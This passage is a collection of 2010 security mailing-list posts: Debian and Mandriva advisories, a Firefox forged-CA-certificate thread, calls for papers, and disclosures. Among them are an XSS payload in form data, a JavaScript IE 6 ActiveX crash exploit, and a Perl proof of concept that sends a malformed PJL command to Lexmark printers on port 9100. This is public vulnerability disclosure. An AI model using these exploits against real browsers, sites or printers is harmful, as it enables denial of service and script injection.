it is possible to execute Javascript code.
Posting using multipart/form-data does not work ; use this data instead:
username...@fucking.mail&password=DTC&SID=>">alert("XSS !!!")
&cur_width=1&window_height=700&id=0121&jaction=none&frameset=active&new_id=0
//- Credits
http://www.sysdream.com/article.php?story_id=326§ion_id=78
IE 6.0 - Local Crash Exploit
###
# Securitylab.ir
###
Vul:
function crash() {
var buff = '';
for(i=0;i<=5000;i++) {buff+="AA";}
object = document.getElementById("opi");
object.Start5QIMWithItv('test','test',buff);
}
.!.
###
# IE 6.0 Local Crash Exploit , By: Pouya Daneshmand
(whh_i...@yahoo.com,Pouya.Securitylab.ir)
###
[SECURITY] [DSA 2021-1] New spamass-milter packages fix remote command execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-2021-1 secur...@debian.org http://www.debian.org/security/Giuseppe Iuculano March 22, 2010http://www.debian.org/security/faq - Package: spamass-milter Vulnerability : missing input sanitization Problem-Type : remote Debian-specific: no CVE Id(s) : none assigned yet Debian Bug : 573228 It was discovered a missing input sanitization in spamass-milter, a milter used to filter mail through spamassassin. This allows a remote attacker to inject and execute arbitrary shell commands. For the stable distribution (lenny), this problem has been fixed in version 0.3.1-8+lenny1. For the testing (squeeze) and unstable (sid) distribution this problem has been fixed in version 0.3.1-9. We recommend that you upgrade your spamass-milter package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian (stable) - --- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1.orig.tar.gz Size/MD5 checksum: 141144 ca6bf6a9c88db74a6bfea41f499c0ba6 http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1.dsc Size/MD5 checksum: 1050 bb733b6a573d78be8a64002dbc592d44 http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1.diff.gz Size/MD5 checksum:35298 c67ac575ec83da156f19d90a21c400e2 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1_alpha.deb Size/MD5 checksum:54606 a623cc750ad2dbeabb4ec9cc238bc40b amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1_amd64.deb Size/MD5 checksum:52752 8f67c0d4ebeb820a0a80b7c8a20a1761 arm architecture (ARM) http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1_arm.deb Size/MD5 checksum:51254 87c4345b656711abf391b2c1620f0fa7 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1_armel.deb Size/MD5 checksum:47902 98855e92d23f6f2665f000a88a163dba hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1_hppa.deb Size/MD5 checksum:55546 6c97177505594b5389fdfe30cd293d80 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1_i386.deb Size/MD5 checksum:50980 109a06776578187d95ae70c3734e6b6d ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1_ia64.deb Size/MD5 checksum:59414 c816e86e810a4d611636bfec6a9df1cc mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1_mipsel.deb Size/MD5 checksum:51306 7204015ca8e050ccf6ea81626e215dbf powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1_powerpc.deb Size/MD5 checksum:55604 039127c2ba41f85b8c5a9c2c0889014b s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1_s390.deb Size/MD5 checksum:51450 f324ff3a60af459f5d15b8efc9e6e891 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/s/spamass-milter/spamass-milter_0.3.1-8+lenny1_sparc.deb Size/MD5 checksum:50052 1ca672e1eeb9a58376c09c61d4f00977 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-annou...@lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAkunThoACgkQNxpp46476apx4gCfV3CGgKbrNHIpZs7Ib4
Re: Firefox 3.6 for Windows includes a forged CA cert
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Good question. Confirmed on Linux version as well (Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6). More information about the rogue-CA can be found here: http://www.phreedom.org/research/rogue-ca/. # openssl x509 -in MD5CollisionsInc.pem -noout -text Certificate: Data: Version: 3 (0x2) Serial Number: 66 (0x42) Signature Algorithm: md5WithRSAEncryption Issuer: C=US, O=Equifax Secure Inc., CN=Equifax Secure Global eBusiness CA-1 Validity Not Before: Jul 31 00:00:01 2004 GMT Not After : Sep 2 00:00:01 2004 GMT Subject: CN=MD5 Collisions Inc. (http://www.phreedom.org/md5) Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public Key: (1024 bit) Modulus (1024 bit): 00:ba:a6:59:c9:2c:28:d6:2a:b0:f8:ed:9f:46:a4: a4:37:ee:0e:19:68:59:d1:b3:03:99:51:d6:16:9a: 5e:37:6b:15:e0:0e:4b:f5:84:64:f8:a3:db:41:6f: 35:d5:9b:15:1f:db:c4:38:52:70:81:97:5e:8f:a0: b5:f7:7e:39:f0:32:ac:1e:ad:44:d2:b3:fa:48:c3: ce:91:9b:ec:f4:9c:7c:e1:5a:f5:c8:37:6b:9a:83: de:e7:ca:20:97:31:42:73:15:91:68:f4:88:af:f9: 28:28:c5:e9:0f:73:b0:17:4b:13:4c:99:75:d0:44: e6:7e:08:6c:1a:f2:4f:1b:41 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: Digital Signature, Non Repudiation, Certificate Sign, CRL Sign X509v3 Basic Constraints: critical CA:TRUE X509v3 Subject Key Identifier: A7:04:60:1F:AB:72:43:08:C5:7F:08:90:55:56:1C:D6:CE:E6:38:EB X509v3 Authority Key Identifier: keyid:BE:A8:A0:74:72:50:6B:44:B7:C9:23:D8:FB:A8:FF:B3:57:6B:68:6C Netscape Comment: 3 Signature Algorithm: md5WithRSAEncryption a7:21:02:8d:d1:0e:a2:80:77:25:fd:43:60:15:8f:ec:ef:90: 47:d4:84:42:15:26:11:1c:cd:c2:3c:10:29:a9:b6:df:ab:57: 75:91:da:e5:2b:b3:90:45:1c:30:63:56:3f:8a:d9:50:fa:ed: 58:6c:c0:65:ac:66:57:de:1c:c6:76:3b:f5:00:0e:8e:45:ce: 7f:4c:90:ec:2b:c6:cd:b3:b4:8f:62:d0:fe:b7:c5:26:72:44: ed:f6:98:5b:ae:cb:d1:95:f5:da:08:be:68:46:b1:75:c8:ec: 1d:8f:1e:7a:94:f1:aa:53:78:a2:45:ae:54:ea:d1:9e:74:c8: 76:67 Mike Duncan ISSO, Application Security Specialist Government Contractor with STG, Inc. NOAA :: National Climatic Data Center On 03/19/2010 04:22 PM, Francis Litterio wrote: > In Firefox 3.6 for Windows, go to Tools -> Options -> Advanced -> Encryption > -> > View Certificates -> Authorities and scroll down to the entry for "Equifax > Secure Inc." and you'll see a cert labeled "MD5 Collisions Inc > (http://www.phreedom.org/md5)" grouped with the other Equifax certs. > > Yes, it's expired, so it poses no real threat, but why is the Mozilla Project > shipping Firefox with that cert? It just causes FUD. > -- > Fran > > -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkunqlwACgkQnvIkv6fg9hZ9xgCeN2pHJd7cR/K0XoLAI4MKSR7P 6TsAn2gJ5czYDikEK25OcVsZngS/lGIN =xb7R -END PGP SIGNATURE-
REMINDER: Month of PHP Security 2010 - CALL FOR PAPERS - Only 3 weeks left
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Month of PHP Security 2010 - CALL FOR PAPERS - Three years ago, in March 2007, the Hardened-PHP project had organized the Month of PHP Bugs. During one month more than 40 vulnerabilities in the PHP interpreter were disclosed in order to improve the overall security of PHP. Now, three years later, SektionEins GmbH will continue in the same spirit and organize the Month of PHP Security. The intention of the Month of PHP Security is to gather the best research and articles about PHP security topics from the security community and share them with the rest of the world. This time the goal is not only to improve the security of PHP itself and applications directly by fixing security bugs, but also to help PHP developers around the world to write better and more secure PHP applications. The Month of PHP Security will be held in May 2010 by SektionEins GmbH. During the month of May all qualifying entries will be published at http://php-security.org day by day. CFP Committee - - The CFP committee for the Month of PHP Security consists of 1) Johann-Peter Hartmann 2) Stefan Esser 3) Fukami 4) Ben Fuhrmannek The CFP committee will review all submissions and select the list of articles that will be published on http://php-security.org Accepted Topics/Articles - * New vulnerability in PHP [1] (not simple safe_mode, open_basedir bypass vulnerabilities) * New vulnerability in PHP related software [1] (popular 3rd party PHP extensions/patches) * Explain a single topic of PHP application security in detail (such as guidelines on how to store passwords) * Explain a complicated vulnerability in/attack against a PHP widespread application [1] * Explain a complicated topic of attacking PHP (e.g. explain how to exploit heap overflows in PHP's heap implementation) * Explain how to attack encrypted PHP applications * Release of a new open source PHP security tool * Other topics related to PHP or PHP application security [1] Articles about new vulnerabilities should mention possible fixes or mitigations. Responsible Disclosure - -- In case of submitted vulnerabilities SektionEins GmbH will contact the security team of the software vendor after the submission deadline and share the vulnerability information with them. Along with the vulnerability information SektionEins will provide the name of the submitting party in order to give proper credits. Prizes - -- At the end of May the CFP committee will review the published material and determine the best entries. Selected winners will get the following prizes. 1. 1000 EUR + Syscan Ticket + CodeScan PHP License 2. 750 EUR + Syscan Ticket 3. 500 EUR + Syscan Ticket 4. 250 EUR + Syscan Ticket 5.-6.CodeScan PHP License 7.-16. Amazon Coupon of 65 USD/50 EUR SektionEins reserves the right to disqualify any submitted entry. While employees of SektionEins can and will submit entries for the Month of PHP Security they are excluded from receiving prizes. The 1000 EUR cash prize and the Syscan tickets were generously sponsored by Syscan. CodeScan PHP Licenses were sponsored by CodeScan Limited. All other cash and non-cash prizes are sponsored by SektionEins. The winners of the Syscan tickets can choose one of the four Syscan 2010 conferences to go to. Syscan Tickets include free admission to the conference, speaker's dinner and speaker party. Hotel and travelcosts are NOT included. Please note that non-cash prizes cannot be changed into cash prizes. Submission - -- Submissions should be sent to c...@php-security.org and consist of the following information: 1) Name and contact information (e-mail, postal address) 2) Employer and/or affiliations 3) Article about one of the allowed topics (at least 1000 words) 4) Optionally additional material like slides, whitepaper in PDF format All submissions must be in English. The preferred delivery format is plain text or HTML, but PDF is also accepted. Please pack all the required items (pictures, text, ...) in a ZIP archive and submit this ZIP archive by email. Deadline for submissions is April 11, 2010. Additional Information - -- After submission SektionEins GmbH will acknowledge submissions with a signed email. If you do not receive such an email within one week after submission, then please contact us at c...@php-security.org again. By submitting your article you are granting SektionEins GmbH the rights to reproduce, distribute, advertise and show your article including but not limited to http://php-security.org, printed and/or electronic advertisements, and all other media. However you are still allowed to publish your own work in whatever way you want. Thanks - -- We would like to thank Syscan and Coseinc for generously offering 1000 EUR cash prize and four tickets to Syscan
[ MDVSA-2010:064 ] libpng
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:064 http://www.mandriva.com/security/ ___ Package : libpng Date: March 23, 2010 Affected: 2009.0, 2009.1, 2010.0, Enterprise Server 5.0 ___ Problem Description: A vulnerability has been found and corrected in libpng: The png_decompress_chunk function in pngrutil.c in libpng 1.0.x before 1.0.53, 1.2.x before 1.2.43, and 1.4.x before 1.4.1 does not properly handle compressed ancillary-chunk data that has a disproportionately large uncompressed representation, which allows remote attackers to cause a denial of service (memory and CPU consumption, and application hang) via a crafted PNG file, as demonstrated by use of the deflate compression method on data composed of many occurrences of the same character, related to a decompression bomb attack (CVE-2010-0205). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0205 ___ Updated Packages: Mandriva Linux 2009.0: e0f5c5c179b1224d99f6b16b718069b1 2009.0/i586/libpng3-1.2.31-2.2mdv2009.0.i586.rpm 5e5e6ec06e5d5997d82b1780c6e364e1 2009.0/i586/libpng-devel-1.2.31-2.2mdv2009.0.i586.rpm 48c2108e471923710e8ac01d7984df3a 2009.0/i586/libpng-source-1.2.31-2.2mdv2009.0.i586.rpm 24e60615f07e3310091b96db44821b55 2009.0/i586/libpng-static-devel-1.2.31-2.2mdv2009.0.i586.rpm 148ad37542ef79c0ed97be519be0478d 2009.0/SRPMS/libpng-1.2.31-2.2mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 0a76c1bbd16c3ff1e23027aeba6dbb70 2009.0/x86_64/lib64png3-1.2.31-2.2mdv2009.0.x86_64.rpm 8e01630ee7eb85327dc226632b535ffd 2009.0/x86_64/lib64png-devel-1.2.31-2.2mdv2009.0.x86_64.rpm ed2d30ab62de27e52052fc2bd5958540 2009.0/x86_64/lib64png-static-devel-1.2.31-2.2mdv2009.0.x86_64.rpm 363e0b340727539dab6765b89660fb43 2009.0/x86_64/libpng-source-1.2.31-2.2mdv2009.0.x86_64.rpm 148ad37542ef79c0ed97be519be0478d 2009.0/SRPMS/libpng-1.2.31-2.2mdv2009.0.src.rpm Mandriva Linux 2009.1: eb835d104959137d6ca68071e8f55fc6 2009.1/i586/libpng3-1.2.35-1.1mdv2009.1.i586.rpm c0154024cdcfa2d9fb221e2f4483546c 2009.1/i586/libpng-devel-1.2.35-1.1mdv2009.1.i586.rpm 22ec75a046bd10bfa69afa223e651357 2009.1/i586/libpng-source-1.2.35-1.1mdv2009.1.i586.rpm 2ddcfacf2b6dfa6bf873ffb49bbec43e 2009.1/i586/libpng-static-devel-1.2.35-1.1mdv2009.1.i586.rpm d28bd0a3c425381e441c0c1d4202ee3d 2009.1/SRPMS/libpng-1.2.35-1.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: c9eec8bdd1b1a2aea33a9e5f8dfdc05e 2009.1/x86_64/lib64png3-1.2.35-1.1mdv2009.1.x86_64.rpm 36436b03497287eefe7011cfc4b69ab5 2009.1/x86_64/lib64png-devel-1.2.35-1.1mdv2009.1.x86_64.rpm 810be607e4dcc0c1e6157dd0281b3122 2009.1/x86_64/lib64png-static-devel-1.2.35-1.1mdv2009.1.x86_64.rpm 948e22de64093275c10dbd781cde02ed 2009.1/x86_64/libpng-source-1.2.35-1.1mdv2009.1.x86_64.rpm d28bd0a3c425381e441c0c1d4202ee3d 2009.1/SRPMS/libpng-1.2.35-1.1mdv2009.1.src.rpm Mandriva Linux 2010.0: 50a03f5191cc9383c09ef152fa6ebb8c 2010.0/i586/libpng3-1.2.40-1.1mdv2010.0.i586.rpm 6a528114a5d5cf86c684a179f5ee36b8 2010.0/i586/libpng-devel-1.2.40-1.1mdv2010.0.i586.rpm 9a1154491d80af5ced9a02e37947bf2c 2010.0/i586/libpng-source-1.2.40-1.1mdv2010.0.i586.rpm fb0671ad70f8202f32c7566d08070a8c 2010.0/i586/libpng-static-devel-1.2.40-1.1mdv2010.0.i586.rpm 5911cb03cac15875905c17214463ab65 2010.0/SRPMS/libpng-1.2.40-1.1mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: 08e10e44a82ca8df8c6586bf07d3b6ce 2010.0/x86_64/lib64png3-1.2.40-1.1mdv2010.0.x86_64.rpm 224425aa77a35bd3233c89613562fe7e 2010.0/x86_64/lib64png-devel-1.2.40-1.1mdv2010.0.x86_64.rpm 2682dae8ecdb43af20aadea093d3f03d 2010.0/x86_64/lib64png-static-devel-1.2.40-1.1mdv2010.0.x86_64.rpm be6b483916a098489e41d13bf2f98d63 2010.0/x86_64/libpng-source-1.2.40-1.1mdv2010.0.x86_64.rpm 5911cb03cac15875905c17214463ab65 2010.0/SRPMS/libpng-1.2.40-1.1mdv2010.0.src.rpm Mandriva Enterprise Server 5: cb7196e7825b553e2414b76e236abf36 mes5/i586/libpng3-1.2.31-2.2mdvmes5.i586.rpm 909211c1ac708b89b790e75261ac27b4 mes5/i586/libpng-devel-1.2.31-2.2mdvmes5.i586.rpm 5216e2e783fee0043ccf34c84db096fd mes5/i586/libpng-source-1.2.31-2.2mdvmes5.i586.rpm 321d36768502ddfb1b90086b6204a670 mes5/i586/libpng-static-devel-1.2.31-2.2mdvmes5.i586.rpm b2e5c72d1cc33ec0e53b36a590cafa35 mes5/SRPMS/libpng-1.2.31-2.2mdv2009.0.src.rpm Mandriva Enterprise Server 5/X86_64: 457da1eac0895ee795e2076d46e723d6 mes5/x86_64/lib64png3-1.2.31-2.2mdvmes5.x86_64.rpm 80a132428cc6638972263f7f92fef9da mes5/x86_64/lib64png-dev
Re: Firefox 3.6 for Windows includes a forged CA cert
If you check further into that certificates configuration, you'll see that it's explicitly disabled, so that if it is encountered, it won't be accepted. Firefox ships with that certificate, so that it can be stopped from using it.
CFP - GameSec 2010 - Conference on Decision and Game Theory for Security
CALL FOR PAPERS GameSec 2010 - Conference on Decision and Game Theory for Security 22-23 November 2010, Berlin, Germany www.gamesec-conf.org *** Important Dates Submission deadline: 15 May 2010 Acceptance date: 23 August 2010 Camera-ready due: 15 September 2010 *** Industry Gold Sponsor: Deutsche Telekom Laboratories Industry Silver Sponsor: Frauenhofer Heinrich Hertz Institute Technical co-sponsors: IEEE Control System Society Internatational Society of Dynamic Games *** GameSec 2010, the inaugural Conference on Decision and Game Theory for Security will take place on the campus of Technical University Berlin, Germany, on November 22-23, 2010. Securing complex and networked systems and managing associated risks become increasingly important as they play an indispensible role in modern life at the turn of the information age. Concurrently, security of ubiquitous communication, data, and computing pose novel research challenges. Security is a multi-faceted problem due to the complexity of underlying hardware, software, and network inter- dependencies as well as human and social factors. It involves decision making in multiple levels and multiple time scales, given the limited resources available to both malicious attackers and administrators defending networked systems. GameSec conference aims to bring together researchers who aim to establish a theoretical foundation for making resource allocation decisions that balance available capabilities and perceived security risks in a principled manner. The conference focuses analytical models based on game, information, communication, optimization, decision, and control theories that are applied to diverse security topics. At the same time, the connection between theoretical models and real world security problems are emphasized to establish the important feedback loop between theory and practice. Observing the scarcity of venues for researchers who try to develop a deeper theoretical understanding of the underlying incentive and resource allocation issues in security, we believe that GameSec will fill an important void and serve as a distinguished forum of highest standards for years to come. Topics of interest include (but are not limited to): * Security games * Security and risk management * Mechanism design and incentives * Decentralized security algorithms * Security of networked systems * Security of Web-based services * Security of social networks * Intrusion and anomaly detection * Resource allocation for security * Optimized response to malware * Identity management * Privacy and security * Reputation and trust * Information security and watermarking * Physical layer security in wireless networks * Information theoretic aspects of security * Adversarial machine learning * Distributed learning for security * Cross-layer security * Usability and security * Human behavior and security * Dynamic control of security systems * Organizational aspects of risk management * Cooperation and competition in security * and more... *** Submission instructions will be available on the conference website. Prospective authors are encouraged to submit a PDF version of their full papers in the announced format and in a font no smaller than 10-points. The initial submissions are limited to 12 single-column pages to decrease the workload of volunteer reviewers. The camera-ready version of accepted papers is limited to 20 single-column pages. The conference language is English. The conference proceedings will be published by Springer in Lecture Notes in Computer Science (LNCS). The proceedings will also be made available online by Springer in full-text electronic form via Springerlink. *** Steering Board Tansu Alpcan (TU-Berlin) Nick Bambos (Stanford Univ.) Tamer Başar (Univ. of Illinois) Anthony Ephremides (Univ. of Maryland) Jean-Pierre Hubaux (EPFL) *** 2010 Organizers General Chair: Tansu Alpcan (TU-Berlin) TPC Co-Chairs: - John Baras (Univ Maryland) - Levente Buttyan (Budapest Univ.) Publicity Co-Chairs: - Zhu Han (Univ. of Houston) - Albert Levi (Sabanci Univ.) Publication Chair: Holger Boche (TU-Berlin) Finance and Registration Chair: Slawomir Stanczak (TU-Berlin) Local Chair: Jean-Pierre Seifert (TU-Berlin) *** Technical Program Committee * Eitan Altman (INRIA, France) * Sonja Buchegger (KTH, Sweden) * Mario Cagalj (Univ. of Split, Croatia) * Srdjan Capkun (ETH Zurich, Switzerland) * Lin Chen (Univ. of Paris-Sud 11, France) * John Chuang (UC Berkeley, USA) * Sajal K. Das (Univ. Texas at A., USA) * Merouane Debbah (Supelec, France) * Mark Felegyhazi (ICSI -Berkeley, USA) * Jens Grossklags (Princeton Univ., USA) * Are Hjorungnes (Univ. of Oslo, Norway) * Eduard A. Jorswieck (Tech. Univ. Dresden, Germany) * Iordanis Koutsopoulos (Univ. of Thessaly, Greece) * Jean Leneutre (Telecom ParisTech, France) * Xiang-Yang Li (Illinois Inst. of Tech., USA) * Li (Erran) Li (Bell Labs., USA) * M. Hossein Manshaei (EPFL, Switzerland) * Piet
{PRL} Lexmark Multiple Laser Printer Remote Stack Overflow
#
Application: Lexmark Multiple Laser Printer Remote Stack Overflow
Platforms: Lexmark Multiple Laser printer
Exploitation: Remote Exploitable
CVE Number: CVE-2010-0619
Discover Date: 2010-01-06
Author: Francis Provencher (Protek Research Lab's)
Website: http://www.protekresearchlab.com
#
1) Introduction
2) Report Timeline
3) Technical details
4) Products affected
5) The Code
#
=
1) Introduction
=
Lexmark specializes in printers and printer accessories. Its current
range of products includes color and monochrome laser printers and
inkjet printers, both of which may include scanners (including
all-in-one devices with faxing and copying capabilities and photo
printers), and dot matrix printers. Lexmark was one of the first
companies to release wifi inkjet printers and the very first to
release printers with a web-enabled touchscreen, coming in early
September of 2009. They also offer a wide variety of laser printers
with software solutions for more professional printing environments.
(Wikipedia)
#
2) Report Timeline
2010-01-06 Vendor Contacted
2010-01-09 Vendor Response
2010-01-09 Vendor request a PoC
2010-01-10 PoC is sent to the vendor
2010-01-12 Vendor confirme they received PoC
2010-01-13 Vendor confirm the vulnerability
2010-03-22 Public release of this advisory
#
==
3) Technical details
==
Multiple Lexmark Laser Printers contain remote stack overflow
vulnerabilities in their PJL processing functionality. These
vulnerabilities could lead to remote code execution on the printer
without authentication. Device freezes when a specialy PLJ request is
sent to the daemon with an invalid argument on PJL INQUIRE command.
#
=
4) Product affected
=
The list is too long, you can found information on the Lexmark web site;
http://support.lexmark.com/alerts
#
=
5) The Code
=
#!/usr/bin/perl -w
# Found by Francis Provencher for Protek Research Lab's
# {PRL} Lexmark Multiple Laser Printer Remote Stack Overflow PoC
#
# This PoC will completly DoS the printer and all is services, Use it
at your own risk.
#
use IO::Socket;
if (@ARGV < 1){
exit
}
$ip = $ARGV[0];
#open the socket
my $sock = new IO::Socket::INET (
PeerAddr => $ip,
PeerPort => '9100',
Proto => 'tcp',
);
$sock or die "no socket :$!";
send($sock, "\033%-1234...@pjl INQUIRE
\r\n",0);
close $sock;
#
(PRL-2010-01)
[ MDVSA-2010:063 ] libpng
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:063 http://www.mandriva.com/security/ ___ Package : libpng Date: March 22, 2010 Affected: 2008.0, Corporate 4.0, Multi Network Firewall 2.0 ___ Problem Description: Multiple vulnerabilities has been found and corrected in libpng: libpng before 1.2.37 does not properly parse 1-bit interlaced images with width values that are not divisible by 8, which causes libpng to include uninitialized bits in certain rows of a PNG file and might allow remote attackers to read portions of sensitive memory via out-of-bounds pixels in the file (CVE-2009-2042). The png_decompress_chunk function in pngrutil.c in libpng 1.0.x before 1.0.53, 1.2.x before 1.2.43, and 1.4.x before 1.4.1 does not properly handle compressed ancillary-chunk data that has a disproportionately large uncompressed representation, which allows remote attackers to cause a denial of service (memory and CPU consumption, and application hang) via a crafted PNG file, as demonstrated by use of the deflate compression method on data composed of many occurrences of the same character, related to a decompression bomb attack (CVE-2010-0205). Packages for 2008.0 are provided for Corporate Desktop 2008.0 customers. The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2042 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0205 ___ Updated Packages: Mandriva Linux 2008.0: a490385a7af091254460923d5b370281 2008.0/i586/libpng3-1.2.22-0.4mdv2008.0.i586.rpm 0a24bbf70a2d0acfe67872e0c9d8f709 2008.0/i586/libpng-devel-1.2.22-0.4mdv2008.0.i586.rpm 4606a9e929c6051e122b70ebe2e7bad4 2008.0/i586/libpng-source-1.2.22-0.4mdv2008.0.i586.rpm 694d03d2e8d3bcd07fc0684fd8a6b0c9 2008.0/i586/libpng-static-devel-1.2.22-0.4mdv2008.0.i586.rpm da310f9645a322af4d2a97b9cf4592eb 2008.0/SRPMS/libpng-1.2.22-0.4mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 4502fd5d882a47d409bfd0e0bc154c88 2008.0/x86_64/lib64png3-1.2.22-0.4mdv2008.0.x86_64.rpm 91b539a7a3a87d57c1ee1e33921aa787 2008.0/x86_64/lib64png-devel-1.2.22-0.4mdv2008.0.x86_64.rpm f0e202692b44e5ebd09168e307a1ad7b 2008.0/x86_64/lib64png-static-devel-1.2.22-0.4mdv2008.0.x86_64.rpm a5c685aa7aac15155af58211a576e08c 2008.0/x86_64/libpng-source-1.2.22-0.4mdv2008.0.x86_64.rpm da310f9645a322af4d2a97b9cf4592eb 2008.0/SRPMS/libpng-1.2.22-0.4mdv2008.0.src.rpm Corporate 4.0: e224d113e77e285d85ff11c55dae9e50 corporate/4.0/i586/libpng3-1.2.8-1.7.20060mlcs4.i586.rpm c0d62f11277442b0d7a909d0c1c53249 corporate/4.0/i586/libpng3-devel-1.2.8-1.7.20060mlcs4.i586.rpm 8ea7ca8ab7bbed8f2683698a3f493d56 corporate/4.0/i586/libpng3-static-devel-1.2.8-1.7.20060mlcs4.i586.rpm 76f958bdba2876ea2a36f42407aaa9dc corporate/4.0/SRPMS/libpng-1.2.8-1.7.20060mlcs4.src.rpm Corporate 4.0/X86_64: a19c0839e78e5d16cc159621ff8e3786 corporate/4.0/x86_64/lib64png3-1.2.8-1.7.20060mlcs4.x86_64.rpm 68d1b5c5174f6de15eb1d68735e45e0f corporate/4.0/x86_64/lib64png3-devel-1.2.8-1.7.20060mlcs4.x86_64.rpm d477b9271f6beba77435121f09dff09d corporate/4.0/x86_64/lib64png3-static-devel-1.2.8-1.7.20060mlcs4.x86_64.rpm 76f958bdba2876ea2a36f42407aaa9dc corporate/4.0/SRPMS/libpng-1.2.8-1.7.20060mlcs4.src.rpm Multi Network Firewall 2.0: 5fe2f05d45ebaac79c58e47429dedceb mnf/2.0/i586/libpng3-1.2.5-10.12.M20mdk.i586.rpm 0ebace3f9758ea06e6471317f95b253f mnf/2.0/i586/libpng3-devel-1.2.5-10.12.M20mdk.i586.rpm 3aa8ba999455eb190979ec7f6f22421a mnf/2.0/i586/libpng3-static-devel-1.2.5-10.12.M20mdk.i586.rpm 1ceca3083b90247ac1d1b68b4bf08f33 mnf/2.0/SRPMS/libpng-1.2.5-10.12.M20mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLp88BmqjQ0CJFipgRAl2vAKCNCYs8gf3lw0tqgRMM
Re: Firefox 3.6 for Windows includes a forged CA cert
> a cert labeled "MD5 Collisions Inc (http://www.phreedom.org/md5)" [...] > Yes, it's expired, so it poses no real threat, but why is the Mozilla > Project shipping Firefox with that cert? It just causes FUD. This is an override for the forged cert, with all trust bits removed. That way should the demo cert make it into the wild users will get a hard failure rather than an overridable one. We worried that many users are trained to accept "expired" certs as fairly normal and not notice it was an expired intermediate rather than the end cert. For more information please see https://bugzilla.mozilla.org/show_bug.cgi?id=471715 -Dan Veditz
